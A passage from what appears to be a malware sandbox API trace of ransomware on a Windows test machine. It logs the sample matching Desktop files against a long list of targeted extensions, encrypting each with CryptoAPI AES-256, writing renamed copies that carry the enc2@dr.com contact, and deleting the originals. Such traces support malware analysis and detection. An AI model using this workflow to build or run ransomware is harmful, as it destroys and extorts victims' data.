returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.408] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.408] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.408] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.411] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x93ac, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x93ac, lpOverlapped=0x0) returned 1
	[0182.414] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.414] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0182.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.417] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.417] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.417] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.417] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x93ac, dwBufLen=0x93ac | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x93b0) returned 1
	[0182.419] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.419] RtlMoveMemory (in: Destination=0xfe6538, Source=0xfdd180, Length=0x93ac | out: Destination=0xfe6538) 
	[0182.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.419] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6538*, pdwDataLen=0x18bc0c*=0x93ac, dwBufLen=0x93b0 | out: pbData=0xfe6538*, pdwDataLen=0x18bc0c*=0x93b0) returned 1
	[0182.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.422] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.422] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.427] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0182.427] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.428] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.428] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.430] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 94
	[0182.430] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.430] WriteFile (in: hFile=0x388, lpBuffer=0xfe6538*, nNumberOfBytesToWrite=0x93b0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe6538*, lpNumberOfBytesWritten=0x18c068*=0x93b0, lpOverlapped=0x0) returned 1
	[0182.434] CloseHandle (hObject=0x388) returned 1
	[0182.435] CloseHandle (hObject=0x384) returned 1
	[0182.435] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif")) returned 1
	[0182.444] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pulmow9bvn4haf5vv1.gif")) returned 0
	[0182.444] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9eb8720, ftCreationTime.dwHighDateTime=0x1d96752, ftLastAccessTime.dwLowDateTime=0x224c1f40, ftLastAccessTime.dwHighDateTime=0x1d96ecf, ftLastWriteTime.dwLowDateTime=0x224c1f40, ftLastWriteTime.dwHighDateTime=0x1d96ecf, nFileSizeHigh=0x0, nFileSizeLow=0x8e20, dwReserved0=0x0, dwReserved1=0x0, cFileName="R0lXGahTxVK uT.swf", cAlternateFileName="R0LXGA~1.SWF")) returned 1
	[0182.444] lstrcmpW (lpString1="R0lXGahTxVK uT.swf", lpString2="..") returned 1
	[0182.445] lstrcmpW (lpString1="R0lXGahTxVK uT.swf", lpString2=".") returned 1
	[0182.445] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.445] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="R0lXGahTxVK uT.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\R0lXGahTxVK uT.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\R0lXGahTxVK uT.swf"
	[0182.445] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\R0lXGahTxVK uT.swf") returned 48
	[0182.445] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.445] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\R0lXGahTxVK uT.swf", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf") returned 0x30
	[0182.445] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.445] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.446] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf"
	[0182.446] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf") returned 48
	[0182.446] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.446] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0182.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.447] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.447] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.447] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.447] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.451] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x8e20, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x8e20, lpOverlapped=0x0) returned 1
	[0182.455] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.455] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0182.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.457] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.457] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.458] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.458] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.458] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x8e20, dwBufLen=0x8e20 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x8e30) returned 1
	[0182.460] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.460] RtlMoveMemory (in: Destination=0xfe5fa8, Source=0xfdd180, Length=0x8e20 | out: Destination=0xfe5fa8) 
	[0182.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.460] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe5fa8*, pdwDataLen=0x18bc0c*=0x8e20, dwBufLen=0x8e30 | out: pbData=0xfe5fa8*, pdwDataLen=0x18bc0c*=0x8e30) returned 1
	[0182.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.463] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.463] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.463] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0182.464] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.464] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.464] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.465] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.466] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 90
	[0182.466] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.466] WriteFile (in: hFile=0x388, lpBuffer=0xfe5fa8*, nNumberOfBytesToWrite=0x8e30, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe5fa8*, lpNumberOfBytesWritten=0x18c068*=0x8e30, lpOverlapped=0x0) returned 1
	[0182.472] CloseHandle (hObject=0x388) returned 1
	[0182.472] CloseHandle (hObject=0x384) returned 1
	[0182.472] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf")) returned 1
	[0182.480] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\r0lxgahtxvk ut.swf")) returned 0
	[0182.480] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8e18fa0, ftCreationTime.dwHighDateTime=0x1d97594, ftLastAccessTime.dwLowDateTime=0x5ddbb350, ftLastAccessTime.dwHighDateTime=0x1d9769e, ftLastWriteTime.dwLowDateTime=0x5ddbb350, ftLastWriteTime.dwHighDateTime=0x1d9769e, nFileSizeHigh=0x0, nFileSizeLow=0x12cd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="S9p-qsrX.pdf", cAlternateFileName="")) returned 1
	[0182.481] lstrcmpW (lpString1="S9p-qsrX.pdf", lpString2="..") returned 1
	[0182.481] lstrcmpW (lpString1="S9p-qsrX.pdf", lpString2=".") returned 1
	[0182.481] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.481] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="S9p-qsrX.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\S9p-qsrX.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\S9p-qsrX.pdf"
	[0182.481] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\S9p-qsrX.pdf") returned 42
	[0182.481] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.481] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\S9p-qsrX.pdf", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf") returned 0x2a
	[0182.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.482] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.482] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf"
	[0182.482] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\s9p-qsrx.pdf") returned 42
	[0182.482] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.482] StrStrW (lpFirst=".pdf", lpSrch=".") returned=".pdf"
	[0182.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
